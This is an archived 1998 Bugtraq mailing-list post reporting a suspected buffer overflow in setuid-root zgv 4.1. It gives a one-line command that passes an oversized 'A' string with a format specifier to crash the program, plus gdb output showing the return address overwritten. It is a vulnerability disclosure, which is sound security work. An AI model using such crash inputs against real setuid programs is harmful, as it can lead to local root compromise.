[8142] in bugtraq
Overflow in zgv-4.1?
daemon@ATHENA.MIT.EDU (onix)
Thu Oct 8 22:58:13 1998
Date: Thu, 8 Oct 1998 00:08:13 -0500
Reply-To: onix <onix@AUTOBAHN.MB.CA>
From: onix <onix@AUTOBAHN.MB.CA>
To: BUGTRAQ@NETSPACE.ORG
Possible security risk in setuid zgv 4.1 which may lead to local root
comprimise. zgv is installed setuid root by default.
onix# zgv -a "`perl -e 'print "A" x 4000'`%s"
Segmentation fault (core dumped)
onix# gdb -c core
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i486-slackware-linux), Copyright 1996 Free Software Foundation,
Inc.
Core was generated by `zgv -a
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x40121a48 in ?? ()
(gdb) backtrace
#0 0x40121a48 in ?? ()
#1 0x41414141 in ?? ()
Cannot access memory at address 0x41414141.
(gdb)
